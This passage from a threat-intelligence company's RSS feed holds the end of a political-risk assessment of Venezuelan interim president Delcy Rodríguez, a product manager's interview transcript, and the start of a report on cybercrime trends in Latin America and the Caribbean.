noting, for instance, the gap between the government’s claimed political prisoner release numbers and the figures cited by independent rights organizations.</p>
        <div>
          <div>
            <div>
              <img loading="lazy" alt="" src="https://www.recordedfuture.com/ko/media_1c851bb0a0865849d18243e4144cefc596663c07a.png?width=750&amp;format=png&amp;optimize=medium" width="1600" height="900" />
            </div>
          </div>
          <div>
            <div><em><strong>Figure 4:</strong></em> <em>Photo of Venezuelan opposition leader Maria Corina Machado at a rally ahead of the 2024 presidential election (Source:</em> <em><a href="https://www.reuters.com/world/americas/venezuelas-nobel-prize-winner-bets-big-trump-pressure-builds-maduro-2025-10-28/">Reuters</a>)</em></div>
          </div>
        </div>
        <p>Machado has received <a href="https://www.foreign.senate.gov/press/dem/release/ranking-member-shaheen-senators-curtis-durbin-cruz-kaine-and-scott-bipartisan-statement-on-venezuela">strong support</a> from bipartisan lawmakers in the US House and Senate, who have questioned US engagement with Rodríguez. While Machado’s efforts to raise the political cost of engagement with the Rodríguez government have earned her support from some allies in Washington, the White House has reportedly <a href="https://www.politico.com/news/2026/02/06/white-house-frustrations-with-venezuelas-machado-surface-after-election-comments-00770005">expressed</a> frustration with her criticism, with officials claiming it undermines US policy. These efforts very likely represent a lesser threat to Rodríguez’s hold on power, given White House insistence on working with Rodríguez, but introduce persistent uncertainty into the sustainability of US support for her.</p>
        <h3>Calls for a Competitive Election</h3>
        <p>Beyond these immediate pressures, the most important mid-term threat to Rodríguez and to future PSUV rule is the election timeline reportedly being promoted by the Trump administration. While the US has refrained from presenting a specific timetable, officials ranging from Chargé d’Affaires Dogu to Secretaries Rubio and Wright have increasingly <a href="https://www.wsj.com/world/americas/venezuelas-new-leader-is-trying-to-run-out-the-clock-on-trump-f5564b52?mod=hp_listb_pos2">signaled</a> publicly that the US expects to see new elections in the next eighteen to twenty-four months. The specifics of these elections, like whether they would be only presidential or include broader general elections (to replace the PSUV-dominated National Assembly), have not been disclosed, but the US insistence on elections in some form very likely forces Rodríguez to reconcile her approach to coalition management with a desire to seek electoral legitimacy on a compressed timeline.</p>
        <p>At the moment, Rodríguez, her inner circle, and PSUV elites almost certainly view a competitive presidential election as an existential threat. Polls have repeatedly demonstrated that the PSUV is unpopular. While Rodríguez is the most popular figure in the PSUV, she would very likely lose a presidential race with Machado by a two-to-one margin, and Machado would very likely defeat any PSUV candidate absent a significant shift in public opinion. Maduro’s removal has not automatically revived grassroots loyalty to the ruling party, with local PSUV leaders <a href="https://www.reuters.com/world/americas/distrust-desertions-dwindling-bonuses-undermine-socialist-partys-grip-venezuela-2026-02-08/%20">describing</a> fractures, demobilization, and severe drops in participation inside local party structures since January 2026.</p>
        <p>Given the PSUV’s lack of legitimacy, US support for elections will likely become a flash point in the relationship with Rodriguez. These tensions will also very likely be exacerbated by opposition mobilization inside the country and Machado’s efforts to marshal support in Washington. While US authorities have not yet demanded that Machado be allowed to return to Venezuela (and has reportedly <a href="https://www.nytimes.com/2026/03/12/world/americas/trump-maria-corina-machado-venezuela.html">asked</a> her to delay any plans to this effect), her return is almost certain to occur well in advance of an election as she has openly said she will run. The temporary <a href="https://www.cnn.com/2026/02/08/americas/venezuela-political-prisoners-opposition-released-latam-intl">re-arrest</a> of opposition figure Juan Pablo Guanipa in February after he began organizing anti-government rallies suggests the ruling party will likely seek to use the repressive apparatus to restrict Machado’s campaigning efforts, elevating the likelihood of pre-election instability. Even if a competitive election is held under the PSUV, the experience of the July 2024 election <a href="https://www.cartercenter.org/publication/final-report-observation-of-the-2024-presidential-election-in-venezuela/">suggests</a> that the ruling party is unlikely to recognize the results if the opposition wins, raising the likelihood of post-election instability, protests, and violence.</p>
        <h2>Delcy Rodríguez’s Origins and Principles of Her Approach to Decisionmaking</h2>
        <p>Before her emergence in recent years as the face of relative economic pragmatism in Chavismo, Delcy Rodríguez’s background was not well-known internationally. But her rise to power reveals a number of factors that likely inform her approach to governance and likely impact the prospect for political and economic stability moving forward. These include:</p>
        <ul>
          <li><strong>Familiarity with Venezuela’s Intelligence and Repressive Apparatus</strong>: In addition to her reputation as an economic reformer, Rodríguez likely has a deep familiarity with intelligence work that, according to state media, goes back to the Chávez years. In 2002-2003, she <a href="https://presidencia.gob.ve/Site/Web/Principal/paginas/classMostrarEvento3.php?id_evento=26747">reportedly</a> worked with the SEBIN’s predecessor agency, the Dirección General Sectorial de los Servicios de Inteligencia y Prevención (DISIP), on undisclosed counterintelligence work involving “geopolitical reports” with former DISIP head Eliezer Otaiza. From the time she rose to the office of Executive Vice President in 2018 until 2021, the SEBIN technically fell under her office. While there is no publicly available evidence that she explicitly directed SEBIN-led repression of dissidents, her role likely afforded her a deep familiarity with the main Venezuelan intelligence agency’s response during the government’s crackdown on the post-2018 election protests and the 2019 protest wave led by opposition figure Juan Guaidó. It is likely that she was, at a minimum, aware of acts of torture, extrajudicial executions, arbitrary detentions, and other alleged human rights violations and crimes against humanity since 2014 that have been <a href="https://www.ohchr.org/en/hr-bodies/hrc/ffmv/index">credibly documented</a> by the Independent International Fact-Finding Mission on Venezuela created by the United Nations (UN) Human Rights Council.</li>
          <li><strong>Identity Shaped by Revolutionary Politics</strong>: Rodríguez was born in Caracas in 1969 and grew up in a politically active left-wing family. Her father, Jorge Antonio Rodríguez, <a href="https://elestimulo.com/de-interes/2022-07-07/carlos-lanz-la-faln-y-los-secuestros-de-las-hijas-de-renny-ottolina-y-de-niehous/">founded</a> an armed urban guerrilla group and was killed in police custody in 1976, allegedly under interrogation. His death made him a martyr among the Venezuelan left, which cemented the revolutionary identities of Rodríguez and her older brother Jorge from an early age. Rodríguez has <a href="https://diariovea.com.ve/asi-conto-delcy-rodriguez-su-experiencia-como-estudiante-de-derecho-su-vida-en-paris-y-el-significado-del-4-f/">framed</a> her decision to study law as an effort to “do justice for her father’s case,” and both she and her brother routinely cite his death as a justification for their support for Hugo Chávez and the movement he founded. In public, Rodríguez has repeatedly expressed strong support for the ruling party’s socialist ideology. In a September 2019 <a href="https://chicagoalbasolidarity.org/2019/10/01/english-text-of-venezuela-vice-president-delcy-rodriguez-speech-to-the-united-nations-general-assembly-september-27-2019/">address</a> to the United Nations General Assembly, she criticized “capitalist supremacism” and ended with a call to “save the world from capitalist violence.”</li>
          <li><strong>Willingness to Break from Ideological Purity</strong>: In practice, Rodríguez’s rise demonstrates that she is open to abandoning ideological purity in order to accomplish her objectives. Unlike Maduro and other ruling party figures who developed close personal ties to Chávez, she had a notoriously poor relationship with the former leader and spent significant time outside Venezuela in her formative years. Rodríguez <a href="%20https://open.spotify.com/episode/009i1LDavksXStl4lboqwf%20">studied</a> law at the Central University of Venezuela, but later pursued postgraduate studies abroad in labor law in London and Paris, and reportedly spent time in the United States. She <a href="https://www.washingtonpost.com/world/2026/01/09/venezuela-us-maduro-capture-vatican-russia">speaks</a> English and French. Rodríguez returned to Venezuela after an opposition-led failed coup attempt against Chávez in 2002, and first worked as an advisor in the Foreign Ministry, and then as Deputy Minister for European Affairs before ending up as Chávez’s Minister for Presidential Affairs. She did not last long in this position, however, and was abruptly dismissed after she <a href="https://talcualdigital.com/delcy-rodriguez-diplomacia-en-pie-de-guerra-perfil/">reportedly</a> argued with and insulted him during a presidential visit to Moscow. Rodríguez then adopted a lower profile in Venezuelan political life until Maduro took power, who made her his foreign minister in 2014. As foreign minister (2014-2017), president of the pro-government National Constituent Assembly (2017-2018), and then as executive vice president (2018-2026), she <a href="https://www.reuters.com/article/world/cubas-new-leader-praises-maduro-in-solidarity-visit-to-venezuela-idUSKCN1IV1ZU/">developed</a> a reputation as a shrewd political operator and staunch Maduro ally.</li>
          <li><strong>Interest in Addressing PSUV’s Declining Popularity</strong>: Although Rodríguez was and arguably remains a Maduro ally, she has demonstrated a clear awareness of how the PSUV’s economic mismanagement has led to its declining popularity and has shown an interest in reversing it. Ahead of the 2018 presidential election, she briefly led a satellite party of the PSUV called the Movimiento Somos Venezuela (“We Are Venezuela Movement”) and served as its leader in a likely attempt to “rebrand” Chavismo and connect with a younger generation of Venezuelans. She was officially <a href="https://2001online.com/nacionales/delcy-rodriguez-vuelve-al-psuv-y-que-paso-con-somos-venezuela">reincorporated</a> into the PSUV’s leadership in late 2018 after her party failed to account for more than six percent of Maduro’s reelection vote. When Maduro made Rodríguez his Minister of Economy in 2020, she began to advance an agenda of relative economic liberalization, and <a href="https://www.bloomberg.com/news/articles/2021-03-09/venezuela-taps-former-ecuador-minister-as-financial-adviser">brought on</a> a team of Ecuadorean advisors to impose tighter fiscal discipline and stabilize the exchange rate, eventually <a href="https://www.reuters.com/article/markets/venezuela-dollarization-has-allowed-for-some-growth-in-commerce-group-says-idUSL1N2PJ1FL/">promoting</a> the de facto dollarization of the economy. The success of the policies contributed to a modest but important economic rebound and led Maduro to appoint her in 2024 as Energy Minister as well, a post she technically still occupies. In overseeing this economic agenda, she began to cultivate a reputation for herself as less of an ideologue and more of a pragmatist, and began to pursue closer relationships with major energy companies and other investors. This reputation almost certainly contributed to the US decision to engage with her government after removing Maduro.</li>
          <li><strong>Calculating Operator with Sense of Persecution</strong>: Rodríguez has a history of keeping track of past instances where she has been slighted, even <a href="https://www.youtube.com/watch?v=NjZn6upVcCc%20">referring</a> to her support of Chavismo and of its revolution as her and her brother’s “personal revenge” for the death of their father. Rodríguez herself has alluded to this trait on state media. In a 2024 appearance on the <em>Con Maduro Podcast,</em> she recalled running into former Argentine President Mauricio Macri, a vocal critic of the Venezuelan government, at the 2022 World Cup in Qatar. Macri had recently been made the Executive Chairman of the FIFA Foundation, and, according to Rodríguez, she shook his hand and <a href="https://fidelernestovasquez.wordpress.com/wp-content/uploads/2024/02/boletin-del-psuv-nr-382-carpeta-fidel-ernesto-vasquez.pdf%20">told him</a>: "Did you see where you are now, and where we are? We're with the Venezuelan people. And you? You're here picking up balls.” Rodríguez is also a savvy operator, and her rise to prominence reflects not only her ability to deliver on economic policy objectives but also her ability to outmaneuver rivals. The best-known instance of this is her leadership of an anti-corruption campaign in 2024, which <a href="%20https://apnews.com/article/delcy-Rodr%C3%ADguez-maduro-trump-venezuela-e71f2289bc801446e05550d8f900a8d1">resulted</a> in the imprisonment of former vice president, oil minister, and longtime rival Tareck El Aissami.</li>
          <li><strong>Openness to Dialogue with Washington</strong>: Even before the current rapprochement between Washington and Caracas, Rodríguez was known for <a href="https://laverdaddevargas.com/delcy-Rodriguez-venezuela-esta-dispuesta-a-dialogar-con-eeuu/">consistently favoring</a> a deeper diplomatic relationship with Washington — albeit one built on mutual respect. During the 2022 phase of exploratory talks in which the two countries negotiated sanctions relief in exchange for holding presidential elections in 2024, Rodríguez publicly maintained that the relationship “cannot be conditioned,” <a href="https://www.aa.com.tr/es/mundo/vicepresidenta-de-venezuela-el-acercamiento-a-estados-unidos-no-fue-condicionado-/2532597">saying</a> that Venezuela’s doors were open to any country that arrived “with respect” and treated it as an equal under international law. During this period, she specifically centered the importance of discussing US oil and gas interests in bilateral diplomacy, saying that Venezuela was willing to pursue “energy dialogue” with US firms, <a href="https://www.mppef.gob.ve/dialogo-venezuela-eeuu-no-puede-estar-condicionado/">indicating</a> a view of energy cooperation as a channel for de-escalating tensions.</li>
        </ul>
        <h2>A Framework for Anticipating Delcy Rodríguez’s Policy Decisions</h2>
        <p>When Delcy Rodríguez faces policy decisions that impact economic and political stability in Venezuela in the coming months, her approach is likely informed by the pillars described above: her revolutionary identity, tactical pragmatism, openness to US engagement, an interest in restoring popular support for the PSUV, a long memory for slights, and familiarity with the security apparatus, as well as the internal and external short- and mid-term threats to her rule. Given these factors, Insikt Group assesses that she is very likely to prioritize near-term governability and economic stabilization over maximalist ideological positioning, while likely cooperating with the US in ways that preserve her credibility inside the ruling coalition. This matters for prospective investors because it suggests the Venezuelan government is likely to seek to maintain a pragmatic economic policy environment focused on short-term macroeconomic stability. At the same time, companies seeking to invest will almost certainly continue to face elevated sanctions compliance risks and potential policy reversals depending on the evolving Washington-Caracas relationship, making it critical to closely monitor Rodríguez’s evolving policy decisions and internal relationships.</p>
        <h3>Coalition Management over Open Confrontation with Rivals</h3>
        <p>Rodríguez will likely prioritize maintaining and reconfiguring her coalition over seeking conflict with internal rivals, because the external pressure she faces makes internal rupture more risky than compromise. Her main rival, Diosdado Cabello, has significant sway over the repressive apparatus and over pro-government armed “colectivos” loyal to him, and his removal could therefore provoke unrest and destabilizing violence. This is precisely the kind of chaos Washington has <a href="https://x.com/RapidResponse47/status/2012228403739418816">sought</a> to avoid, and very likely why it opted to keep Rodríguez in place as interim president in the first place. She therefore likely assesses that purging, detaining, or otherwise sidelining Cabello or other top PSUV rivals could risk calling into question her ability to maintain order, and would undermine her position with Washington as a lynchpin of relative calm and continuity.</p>
        <p>This is likely the reason that Rodríguez has sought to balance the ruling coalition since taking power rather than immediately shaping it to align with her preferences. Although she <a href="https://www.swissinfo.ch/spa/rodr%C3%ADguez-nombra-a-un-exjefe-del-banco-central-de-venezuela-como-vicepresidente-econ%C3%B3mico/90734912">elevated</a> her allies to higher positions in her government early in her tenure — such as appointing Calixto Ortega as Vice President of Economy — she has largely kept the ruling apparatus in place. Not only has she left a number of other figures close to Cabello in their positions, but she has also promoted figures in Cabello’s network. Just three days after Maduro’s capture, she <a href="https://www.eltiempo.com/mundo/venezuela/el-blindaje-de-delcy-Rodr%C3%ADguez-una-pieza-de-diosdado-cabello-asume-control-de-seguridad-presidencial-3522518">named</a> Gustavo González López, believed to be a Cabello ally, to lead both the Presidential Honor Guard and the Directorate General of Military Counterintelligence (DGCIM). On March 18, she also named González López to be her Defense Minister, replacing Padrino López. She also appointed Cabello’s daughter, Daniella Cabello, to be Minister of Tourism — a significant post that will afford her a direct role in reopening Venezuela to international commercial activity. These moves were likely taken out of a desire to effectively secure Cabello’s support for her economic normalization agenda.</p>
        <h3>Face-Saving Cooperation with Washington</h3>
        <p>Rodríguez will likely continue to cooperate with Washington’s energy priorities, but she will very likely pair this compliance with visible signaling aimed at saving face with PSUV loyalists. This is likely why, even as she has received high-level US officials in Caracas and even spoken with Trump over the phone, she has publicly demonstrated support for retaining partnerships with US adversaries. On January 8, for instance, Cuban Foreign Minister Bruno Rodríguez traveled to Caracas and accompanied the interim president to <a href="https://www.reutersconnect.com/item/ceremony-honouring-venezuelan-and-cuban-military-and-security-personnel-who-died-during-a-us-operation-to-capture-venezuelas-president-maduro-and-his-wife-in-caracas/dGFnOnJldXRlcnMuY29tLDIwMjY6bmV3c21sX1JDMjZYSUFJRURDNA">speak</a> at a commemoration event at Venezuela’s Military Academy for the Cuban and Venezuelan casualties from the January 3 US operation to capture Maduro. This was Rodríguez’s first event in which she officially presided over a military ceremony as commander in chief of the armed forces. On the same day, state-run media reported that Rodríguez held a meeting with Chinese Ambassador to Venezuela Lan Hu, in which she <a href="https://www.scmp.com/news/china/diplomacy/article/3339375/china-says-it-still-deeply-committed-venezuela-ambassador-meets-new-leader">thanked</a> China for its support for Venezuelan sovereignty and described the encounter as “cordial.” The ambassadors of China, Russia, and Iran were given <a href="https://www.telesurtv.net/delcy-Rodriguez-presidenta-encargada-venezuela">front row seats</a> to Rodríguez’s January 5 swearing-in ceremony, and state TV broadcast images of the Venezuelan leader greeting them affectionately.</p>
        <div>
          <div>
            <div>
              <img loading="lazy" alt="" src="https://www.recordedfuture.com/ko/media_143aa6ed2eebd4cdc806f2d890d690d017670ae16.png?width=750&amp;format=png&amp;optimize=medium" width="1600" height="909" />
            </div>
          </div>
          <div>
            <div><em><strong>Figure 5:</strong></em> <em>Screenshot of Venezuelan state TV broadcast showing Chinese ambassador Lan Hu, Russian ambassador Sergey Mélik-Bagdasárov, and Iranian ambassador Ali Chegueni were prominently seated at Venezuelan Acting President Delcy Rodríguez’s January 5, 2025, swearing-in ceremony (Source:</em> <em><a href="https://www.youtube.com/watch?v=3oMay9b3BnI&amp;t=398s">Telesur</a>)</em></div>
          </div>
        </div>
        <p>Such gestures will very likely continue as they offer Rodríguez a way to preserve credibility among PSUV elites and everyday party faithful. She can claim that her rapidly evolving relationship with Washington is a sovereign decision that improves stability and living conditions, rather than a relationship that is shaped by a drastically uneven playing field. As part of presenting an image of mixed compliance with Washington’s demands for Venezuelan audiences, she will almost certainly continue insisting that Maduro remains the legitimate president and demand his return, even as she works to consolidate her own power.</p>
        <h3>Leveraging Hardliners to Justify Non-Compliance</h3>
        <p>The internal rivalries identified above represent significant threats to Rodríguez’s legitimacy inside the PSUV and her claim to power, and attempting to balance her coalition while consolidating her control will almost certainly be a major challenge for Rodríguez. However, it is likely that Rodríguez will, over time, point to alleged hardliners to justify selective non-compliance with US aims, credibly or otherwise. Ultimately, it may be useful for Rodríguez to be able to point to ongoing tensions in her coalition or the prospect of instability as a way of warding off US pressure for an eventual transition or for competitive elections to be held. This justification is likely to lose credibility over time if she continues to consolidate administrative control and accumulate legitimacy, especially if she presides over significant economic gains amid US sanctions relief. Ultimately, the very steps that allow her to consolidate her rule may eventually be used by Washington to justify accelerating the end of it.</p>
        <h3>Resistance to Elections if Seen as an Existential Threat</h3>
        <p>Rodríguez’s past political experience and the PSUV’s record across more than 25 years of governing suggest the Venezuelan government will very likely seek to maximize political gain from any economic growth resulting from US sanctions relief and economic normalization. And while US officials have routinely conveyed that they expect elections to be held in the next two years, the Venezuelan government is almost certain to resist or sabotage elections unless it perceives that economic improvement has boosted the PSUV’s chances of winning a competitive election. Even then, the PSUV will very likely seek to use its control of government to activate patronage networks, divert public resources to politicized social programs, and attempt to present legal obstacles to opposition campaigning — just as it did in the lead-up to the 2024 presidential election.</p>
        <p>Ultimately, this logic is consistent with how Chavista elites have historically conceptualized elections: In multiple instances of US-backed talks meant to offer sanctions relief in exchange for competitive elections, Venezuelan government negotiators routinely <a href="https://www.wola.org/wp-content/uploads/2021/07/WOLA-USIP-Report.pdf">argued</a> that elections can be considered “fair” only if voters can judge the government without the distorting economic effects of sanctions. If economic growth does not translate into a boost in popular support for the ruling party, Rodríguez will likely come under increasing pressure from rivals to resist a US-backed transition. It is therefore likely that democratization in Venezuela will be phased and gradual, not immediate, and will likely depend in large part on whether elements of the ruling elite see a viable future for themselves in the country as a possible outcome after alternating power.</p>
        <h2>Outlook</h2>
        <p>Over the coming months, Delcy Rodríguez is very likely to prioritize near-term governability and economic stabilization over maximalist ideological positioning, while still finding ways to cooperate with the United States that preserve her rule and credibility inside the ruling PSUV coalition. In the short- to mid-term, the main challenge she faces is the threat posed by internal rivals who may feel threatened by her reforms. This makes her cabinet changes, and evidence of backlash among political and economic elites, crucial variables to watch. In confronting internal threats to her rule, she will likely pursue a strategy of coalition management over one of open confrontation. Even as Rodríguez continues to consolidate power and tries to keep hardline rivals contained, she will likely avoid high-risk moves that could fracture elite support and risk threatening her relationship with Washington.</p>
        <p>In the short and mid terms, the main flashpoints will be US pressure to end Caracas’s relationships with Moscow, Beijing, and other US adversaries, as well as US pressure to hold competitive elections in the next two years and eventually to advance a political transition. Rodríguez and PSUV elites likely view a genuinely competitive presidential vote as an existential threat. As a result, the government is almost certain to resist or sabotage competitive elections unless economic improvement significantly boosts the PSUV’s electoral odds. Even then, it would likely use patronage, politicized social programs, and legal obstacles to constrain opposition campaigning and preserve an institutional advantage. This raises the prospect of instability both in the lead-up and in the aftermath of any elections, given the likelihood of opposition protests and an associated crackdown. Given these dynamics, any transition is more likely to be phased and gradual than immediate, with stability hinging on whether Rodríguez is able to consolidate support among the ruling elite and whether the broader Chavista coalition can see a viable future for itself under any eventual alternation of power.<br /><br /><br /><strong>Appendix A: 2026 OFAC Licenses Issued for Venezuela</strong></p>
        <div>
          <div>
            <div>Date Issued</div>
            <div>Title (Hyperlink)</div>
            <div>Scope</div>
          </div>
          <div>
            <div>February 3, 2026</div>
            <div>
              <h4><a href="https://ofac.treasury.gov/recent-actions/20260203">Venezuela General License 47: “Authorizing the Sale of U.S.-Origin Diluents to Venezuela”</a></h4>
            </div>
            <div>Authorizes US persons to export/reexport/sell/supply US-origin diluents to Venezuela even when transactions involve the Government of Venezuela, PDVSA, or PDVSA-majority entities, as long as contracts are governed by US law and disputes are resolved in the US</div>
          </div>
          <div>
            <div>February 10, 2026</div>
            <div>
              <h4><a href="https://ofac.treasury.gov/recent-actions/20260210_33">Venezuela General License 46A: “Authorizing Certain Activities Involving Venezuelan-Origin Oil”</a></h4>
            </div>
            <div>Authorizes “established US entities” to engage in transactions that are ordinarily incident and necessary to the lifting, export/reexport, sale/resale, supply, storage, marketing, purchase, delivery, transportation, and refining of Venezuelan-origin oil, including related logistics, even when the activity involves the Government of Venezuela, PDVSA, or PDVSA-majority entities</div>
          </div>
          <div>
            <div>February 10, 2026</div>
            <div>
              <h4><a href="https://ofac.treasury.gov/sanctions-programs-and-country-information/venezuela-related-sanctions">Venezuela General License 48: “Authorizing the Supply of Certain Items and Services to Venezuela</a></h4>
              <h4><a href="https://ofac.treasury.gov/sanctions-programs-and-country-information/venezuela-related-sanctions">”</a></h4>
            </div>
            <div>Authorizes OFAC to permit the provision from the US of goods, technology, software, and services needed for oil and gas exploration, development, production, and maintenance in Venezuela, even when transactions involve the Government of Venezuela and PDVSA</div>
          </div>
          <div>
            <div>February 13, 2026</div>
            <div>
              <h4><a href="https://ofac.treasury.gov/recent-actions/20260213">Venezuela General License 49: “Authorizing Negotiations of and Entry Into Contingent Contracts for Certain Investment in Venezuela”</a></h4>
            </div>
            <div>Authorizes transactions otherwise that are “related to the negotiation of and entry into” contingent contracts with the Government of Venezuela, PDVSA, or PDVSA-majority-owned entities — so long as the contract’s performance is expressly contingent on separate OFAC authorization</div>
          </div>
          <div>
            <div>February 13, 2026</div>
            <div>
              <h4><a href="https://ofac.treasury.gov/recent-actions/20260213">Venezuela General License 50: “Authorizing Transactions Related to Oil or Gas Sector Operations in Venezuela of Certain Entities”</a></h4>
            </div>
            <div>Authorizes transactions related to oil or gas sector operations in Venezuela conducted by specified companies and their subsidiaries, provided contracts are governed by US law (with disputes resolved in the US) and most payments to blocked persons (including taxes/royalties) are routed to specified US-directed deposit funds</div>
          </div>
        </div>
        <p><em><strong>Table 1:</strong></em> <em>A list of OFAC general licenses issued since the passage of the Venezuela hydrocarbons law(source: US Office of Foreign Assets Control)</em></p>
      ]]></content:encoded>
            <category>Research (Insikt)</category>
            <enclosure length="0" type="image/jpg" url="https://www.recordedfuture.com/ko/research/media_1d08f25ae63a57a954e41789fb5634f3df6f8a5c5.gif?width=1200&amp;format=pjpg&amp;optimize=medium"/>
        </item>
        <item>
            <title><![CDATA[Day in the Life: Product Manager at Recorded Future]]></title>
            <link>https://www.recordedfuture.com/ko/blog/kyle-kohler-product-manager</link>
            <guid isPermaLink="false">https://www.recordedfuture.com/ko/blog/kyle-kohler-product-manager</guid>
            <pubDate>Fri, 03 Apr 2026 00:00:00 GMT</pubDate>
            <description><![CDATA[VentureFizz interviews Senior Product Manager Kyle Kohler on his role at Recorded Future]]></description>
            <content:encoded><![CDATA[
        <div>
          <div>
            <div>Recorded Future is the World’s Largest Intelligence Company. Our team works to build products that customers love. In this video, Kyle Kohler interviewed with VentureFizz about his day-to-day as a Senior Product Manager for Integrations. He describes the job as truly multifaceted, encompassing starting new strategic initiatives, turning customers feedback into improvements, and enabling other team members to do the same. Full video and transcript available below.</div>
          </div>
        </div>
        <div>
          <div>
            <div><a href="https://www.youtube.com/watch?v=EbnzqFfySs0&amp;t=94s">https://www.youtube.com/watch?v=EbnzqFfySs0&amp;t=94s</a></div>
          </div>
        </div>
        <p><strong>Read the Full Video Transcript:</strong></p>
        <p>I’m Kyle Kohler. I’m a product manager over the integration strategy at Recorded Future.</p>
        <p>Recorded Future is the world’s largest threat intelligence provider. We are covering all sorts of domains of intelligence. It’s geopolitical intelligence, cyber intelligence, payment fraud intelligence. And essentially intelligence is this data that an organization uses to take action and make a better decision. So the more that you understand a subject or topic, a current event, the better that you can define what actions you take to either defend your organization or proactively increase your competitive edge.</p>
        <p>As a product manager, it’s funny. I see it as this arson firefighter educator role. And I think that definitely needs to be unpacked a bit. As an arson, you’re starting fires. So, very strategically, which fire do I put under which team, under which initiative, which fire do I stoke and one do I burn hotter? And as a firefighter, you’ve got maybe fires coming in being reported to you from a customer, from an organization, from another product team who needs this other product team to make something happen. And so, you’re very strategically figuring out what to stamp out, what to stoke. And as an educator, you’re also teaching others how to start fires and put out fires. So, you’re constantly going from one thing to the next and keeping all of these moving pieces going. There’s no one project that you just shepherd along and that’s the only thing you work on. You’re constantly context switching and a good product manager has that multi-domain knowledge to think laterally, but also track how this thing affects that thing and how it might affect the other thing in the future.</p>
        <p>At Recorded Future, we’re a global organization and I’m based on the west coast of California. So I wake up in the morning and the first thing I’ve got are 10 to 12 Slack messages from across the globe that come in from different geographies. Other people are ending their day and they’ve got some questions that maybe I can answer or they’re looking for how to direct on who might have the right answer. So the first thing generally starts with voraciously checking Slack and I’m answering notifications as I mentioned questions and the next thing is okay well from the answers to those questions are there new initiatives that need to get spun up or are there existing initiatives that need to get nudged along or are there certain fires that need to get stamped out and that’s the whole day is you’re really tracking where things are in their current state what needs to get responded to and what needs to get pushed along.</p>
        <p>Recorded Future really was attractive to me because it was a pretty new field within cyber security and within technology but also as a company was not just related to IT and cyber had this geopolitical and payment fraud type of angle looking at the world. So it was really taking a big data problem how do you track everything that happens everywhere but then how do you break that down into these bite-sized pieces that ultimately help an organization’s current mission. So I really was attracted by the fact that we are helping organizations secure the world. We’re able to do that by securing the world with intelligence, but it’s so multi-domain that you’re just never going to get bored. There’s always something new. There’s always something to track. There’s always some new threat. There’s always some new initiative, some new innovation. And Recorded Future has really been at that cutting edge of innovation. Always coming up with what’s next in the market, what’s next in the threat landscape and how will we as a company address supercharging the existing missions of our organizations that we help today.</p>
        <p>Original content: <a href="https://venturefizz.com/insights/what-i-do-at-recorded-future-senior-product-manager/">https://venturefizz.com/insights/what-i-do-at-recorded-future-senior-product-manager/</a></p>
      ]]></content:encoded>
            <category>Blog</category>
            <enclosure length="0" type="image/jpg" url="https://www.recordedfuture.com/ko/blog/media_1c70771f1d2a1c1ea57a0c8903617a776599d63c7.png?width=1200&amp;format=pjpg&amp;optimize=medium"/>
        </item>
        <item>
            <title><![CDATA[Latin America and the Caribbean Cybercrime Landscape]]></title>
            <link>https://www.recordedfuture.com/ko/research/latin-america-and-the-caribbean-cybercrime-landscape</link>
            <guid isPermaLink="false">https://www.recordedfuture.com/ko/research/latin-america-and-the-caribbean-cybercrime-landscape</guid>
            <pubDate>Thu, 02 Apr 2026 00:00:00 GMT</pubDate>
            <description><![CDATA[This report provides an overview of trends and developments in the cybercriminal ecosystem of Latin America and the Caribbean (LAC) in 2025.]]></description>
            <content:encoded><![CDATA[
        <h2>Executive Summary</h2>
        <p>This report provides an overview of trends and developments in the cybercriminal ecosystem of Latin America and the Caribbean (LAC) in 2025. Insikt Group found that threat actors operating in or targeting the LAC region predominantly use client-server applications and end-to-end encrypted messaging platforms such as Telegram, as well as established English- or Russian-speaking dark web and special-access forums, to communicate and conduct activities. Threat actors demonstrate increased sophistication in their operations, adapting their tactics, techniques, and procedures (TTPs) over time, while still relying primarily on traditional methods such as phishing and social engineering, malware distribution, and ransomware. Based on our analysis, we have determined that Brazil, Mexico, and Argentina were the countries most targeted by financially motivated cybercriminals, likely because they are LAC's largest economies. Additionally, based on this research, Insikt Group found that threat actors often targeted critical industries such as healthcare, finance, and government because they hold high-value data, face operational urgency, and, at times, rely on legacy systems that may be vulnerable.</p>
        <h2>Key Findings</h2>
        <ul>
          <li>Insikt Group assesses that criminal forum DarkForums and the messaging platform Telegram are the primary special-access forums and communications platforms used by threat actors operating in or targeting the LAC region.</li>
          <li>Threat actors operating in or targeting LAC are typically financially motivated and frequently leverage social engineering, ransomware, and various forms of mobile malware to gain initial access to government, healthcare, and financial institutions.</li>
          <li>In 2025, Insikt Group recorded 452 ransomware incidents impacting the LAC region. The top five industries affected were healthcare, manufacturing, government, information technology, and education, all of which observed a noticeable increase in attacks compared to the previous year.</li>
          <li>Insikt Group continued to identify banking trojans being leveraged by threat actors, with established variants being the most widely used. Specifically, threat actors used banking trojans in targeted smishing campaigns targeting WhatsApp users to gain access to financial data and steal credentials.</li>
          <li>Insikt Group identified LummaC2 as the most prolific information stealer (infostealer) affecting organizations in LAC in the first half of 2025 and Vidar in the second half, following law enforcement disruption of LummaC2.</li>
        </ul>
        <h2>Background</h2>
        <p>In the <a href="https://digiamericas.org/wp-content/uploads/2025/06/FinancialSector_EN.pdf">aftermath</a> of the COVID-19 pandemic, the LAC region underwent rapid digital development that outpaced security maturity, leading to asymmetrical cloud adoption, reliance on legacy infrastructure, and the introduction of remote work across all verticals. Many organizations adopted software-as-a-service (SaaS) platforms without effectively implementing strong access controls or multi-factor authentication (MFA) methods, leaving them exposed to ransomware and data theft, among other cyberattacks. Economic instability (inflation and currency controls) in LAC countries has created incentives for cybercrime while weakening institutional defenses. Political volatility, social protests, and corruption have created new opportunities for financially and politically motivated threat actors. Compounded factors such as high youth unemployment, income inequality, and the influence of informal economies have driven individuals to seek alternative sources of income, which in turn fuels much of the cybercrime we see today.</p>
